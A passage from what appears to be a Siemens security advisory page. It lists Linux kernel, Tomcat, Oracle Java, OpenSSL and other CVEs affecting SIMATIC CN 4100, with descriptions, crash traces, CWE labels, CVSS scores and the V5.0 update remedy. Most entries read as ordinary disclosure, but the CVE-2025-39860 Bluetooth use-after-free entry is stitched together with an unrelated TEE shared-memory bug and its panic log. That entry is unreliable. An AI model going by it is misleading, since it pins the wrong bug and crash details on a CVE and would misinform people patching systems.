commit c353e8983e0d ("net: introduce per netns packet chains"). skb->dev becomes NULL and we crash in __netif_receive_skb_core(). Before above commit, different kind of bugs or corruptions could happen without a major crash. But the root cause is that ax25_kiss_rcv() can queue/mangle input skb without checking if this skb is shared or not. Many thanks to Bernard Pidoux for his help, diagnosis and tests. We had a similar issue years ago fixed with commit 7aaed57c5c28 ("phonet: properly unshare skbs in phonet_rcv()"). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39849 In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: sme: cap SSID length in __cfg80211_connect_result() If the ssid->datalen is more than IEEE80211_MAX_SSID_LEN (32) it would lead to memory corruption so add some bounds checking. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39853 In the Linux kernel, the following vulnerability has been resolved: i40e: Fix potential invalid access when MAC list is empty list_first_entry() never returns NULL - if the list is empty, it still returns a pointer to an invalid object, leading to potential invalid memory access when dereferenced. Fix this by using list_first_entry_or_null instead of list_first_entry. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39857 In the Linux kernel, the following vulnerability has been resolved: net/smc: fix one NULL pointer dereference in smc_ib_is_sg_need_sync() BUG: kernel NULL pointer dereference, address: 00000000000002ec PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP PTI CPU: 28 UID: 0 PID: 343 Comm: kworker/28:1 Kdump: loaded Tainted: G OE 6.17.0-rc2+ #9 NONE Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 Workqueue: smc_hs_wq smc_listen_work [smc] RIP: 0010:smc_ib_is_sg_need_sync+0x9e/0xd0 [smc] ... Call Trace: smcr_buf_map_link+0x211/0x2a0 [smc] __smc_buf_create+0x522/0x970 [smc] smc_buf_create+0x3a/0x110 [smc] smc_find_rdma_v2_device_serv+0x18f/0x240 [smc] ? smc_vlan_by_tcpsk+0x7e/0xe0 [smc] smc_listen_find_device+0x1dd/0x2b0 [smc] smc_listen_work+0x30f/0x580 [smc] process_one_work+0x18c/0x340 worker_thread+0x242/0x360 kthread+0xe7/0x220 ret_from_fork+0x13a/0x160 ret_from_fork_asm+0x1a/0x30 If the software RoCE device is used, ibdev->dma_device is a null pointer. As a result, the problem occurs. Null pointer detection is added to prevent problems. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39860 In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix use-after-free in l2cap_sock_cleanup_listen() syzbot reported the splat below without a repro. In the splat, a single thread calling bt_accept_dequeue() freed sk and touched it after that. The root cause would be the racy l2cap_sock_cleanup_listen() call added by the cited commit. bt_accept_dequeue() is called under lock_sock() except for l2cap_sock_release(). Two threads could see the same socket during the list iteration in bt_accept_dequeue(): CPU1 CPU2 (close()) ---- ---- sock_hold(sk) sock_hold(sk); lock_sock(sk) shm = reg_pair_to_ptr(...);//shm maybe return NULL tee_shm_free(shm); --> tee_shm_put(shm);//crash Add check in tee_shm_put to fix it. panic log: Unable to handle kernel paging request at virtual address 0000000000100cca Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=0000002049d07000 [0000000000100cca] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP CPU: 2 PID: 14442 Comm: systemd-sleep Tainted: P OE ------- ---- 6.6.0-39-generic #38 Source Version: 938b255f6cb8817c95b0dd5c8c2944acfce94b07 Hardware name: greatwall GW-001Y1A-FTH, BIOS Great Wall BIOS V3.0 10/26/2022 pstate: 80000005 (Nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : tee_shm_put+0x24/0x188 lr : tee_shm_free+0x14/0x28 sp : ffff001f98f9faf0 x29: ffff001f98f9faf0 x28: ffff0020df543cc0 x27: 0000000000000000 x26: ffff001f811344a0 x25: ffff8000818dac00 x24: ffff800082d8d048 x23: ffff001f850fcd18 x22: 0000000000000001 x21: ffff001f98f9fb88 x20: ffff001f83e76218 x19: ffff001f83e761e0 x18: 000000000000ffff x17: 303a30303a303030 x16: 0000000000000000 x15: 0000000000000003 x14: 0000000000000001 x13: 0000000000000000 x12: 0101010101010101 x11: 0000000000000001 x10: 0000000000000001 x9 : ffff800080e08d0c x8 : ffff001f98f9fb88 x7 : 0000000000000000 x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 x2 : ffff001f83e761e0 x1 : 00000000ffff001f x0 : 0000000000100cca Call trace: tee_shm_put+0x24/0x188 tee_shm_free+0x14/0x28 __optee_disable_shm_cache+0xa8/0x108 optee_shutdown+0x28/0x38 platform_shutdown+0x28/0x40 device_shutdown+0x144/0x2b0 kernel_power_off+0x3c/0x80 hibernate+0x35c/0x388 state_store+0x64/0x80 kobj_attr_store+0x14/0x28 sysfs_kf_write+0x48/0x60 kernfs_fop_write_iter+0x128/0x1c0 vfs_write+0x270/0x370 ksys_write+0x6c/0x100 __arm64_sys_write+0x20/0x30 invoke_syscall+0x4c/0x120 el0_svc_common.constprop.0+0x44/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x24/0x88 el0t_64_sync_handler+0x134/0x150 el0t_64_sync+0x14c/0x15 View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39866 In the Linux kernel, the following vulnerability has been resolved: fs: writeback: fix use-after-free in __mark_inode_dirty() An use-after-free issue occurred when __mark_inode_dirty() get the bdi_writeback that was in the progress of switching. CPU: 1 PID: 562 Comm: systemd-random- Not tainted 6.6.56-gb4403bd46a8e #1 ...... pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __mark_inode_dirty+0x124/0x418 lr : __mark_inode_dirty+0x118/0x418 sp : ffffffc08c9dbbc0 ........ Call trace: __mark_inode_dirty+0x124/0x418 generic_update_time+0x4c/0x60 file_modified+0xcc/0xd0 ext4_buffered_write_iter+0x58/0x124 ext4_file_write_iter+0x54/0x704 vfs_write+0x1c0/0x308 ksys_write+0x74/0x10c __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x114 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x40/0xe4 el0t_64_sync_handler+0x120/0x12c el0t_64_sync+0x194/0x198 Root cause is: systemd-random-seed kworker ---------------------------------------------------------------------- ___mark_inode_dirty inode_switch_wbs_work_fn spin_lock(&inode->i_lock); inode_attach_wb locked_inode_to_wb_and_lock_list get inode->i_wb spin_unlock(&inode->i_lock); spin_lock(&wb->list_lock) spin_lock(&inode->i_lock) inode_io_list_move_locked spin_unlock(&wb->list_lock) spin_unlock(&inode->i_lock) spin_lock(&old_wb->list_lock) inode_do_switch_wbs spin_lock(&inode->i_lock) inode->i_wb = new_wb spin_unlock(&inode->i_lock) spin_unlock(&old_wb->list_lock) wb_put_many(old_wb, nr_switched) cgwb_release old wb released wb_wakeup_delayed() accesses wb, then trigger the use-after-free issue Fix this race condition by holding inode spinlock until wb_wakeup_delayed() finished. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-40300 In the Linux kernel, the following vulnerability has been resolved: x86/vmscape: Add conditional IBPB mitigation VMSCAPE is a vulnerability that exploits insufficient branch predictor isolation between a guest and a userspace hypervisor (like QEMU). Existing mitigations already protect kernel/KVM from a malicious guest. Userspace can additionally be protected by flushing the branch predictors after a VMexit. Since it is the userspace that consumes the poisoned branch predictors, conditionally issue an IBPB after a VMexit and before returning to userspace. Workloads that frequently switch between hypervisor and userspace will incur the most overhead from the new IBPB. This new IBPB is not integrated with the existing IBPB sites. For instance, a task can use the existing speculation control prctl() to get an IBPB at context switch time. With this implementation, the IBPB is doubled up: one at context switch and another before running userspace. The intent is to integrate and optimize these cases post-embargo. [ dhansen: elaborate on suboptimal IBPB solution ] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-402 Transmission of Private Resources into a New Sphere ('Resource Leak') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N CVE-2025-43368 A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26, iOS 26 and iPadOS 26, macOS Tahoe 26. Processing maliciously crafted web content may lead to an unexpected Safari crash. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L CVE-2025-47219 In GStreamer through 1.26.1, the isomp4 plugin's qtdemux_parse_trak function may read past the end of a heap buffer while parsing an MP4 file, possibly leading to information disclosure. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2025-48989 Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected. Users are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108 which fix the issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-404 Improper Resource Shutdown or Release Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-53057 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2025-53066 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2025-55752 Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-23 Relative Path Traversal Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-55754 Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.60 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-150 Improper Neutralization of Escape, Meta, or Control Sequences Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CVE-2025-61748 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 21.0.8 and 25; Oracle GraalVM for JDK: 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2025-61795 Improper Resource Shutdown or Release vulnerability in Apache Tomcat. If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-404 Improper Resource Shutdown or Release Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2026-2673 Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword. Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicated keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server. If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups were treated as a single sufficiently secure 'tuple', with the server not sending a Hello Retry Request (HRR) even when a group in a more preferred tuple was mutually supported. As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519' being the only ones in the client's initial keyshare prediction). OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure. If any of the keyshares predicted by the client were supported by the server the most preferred among these was selected, even if other groups supported by the client, but not included in the list of predicted keyshares would have been more preferred, if included. The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security. Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple, but did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group. The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'. No OpenSSL FIPS modules are affected by this issue, the code in question lies outside the FIPS boundary. OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-21925 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: RMI). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N CVE-2026-21932 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: AWT, JavaFX). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N CVE-2026-21933 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVE-2026-21945 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). View CVE Details Affected Products Siemens SIMATIC 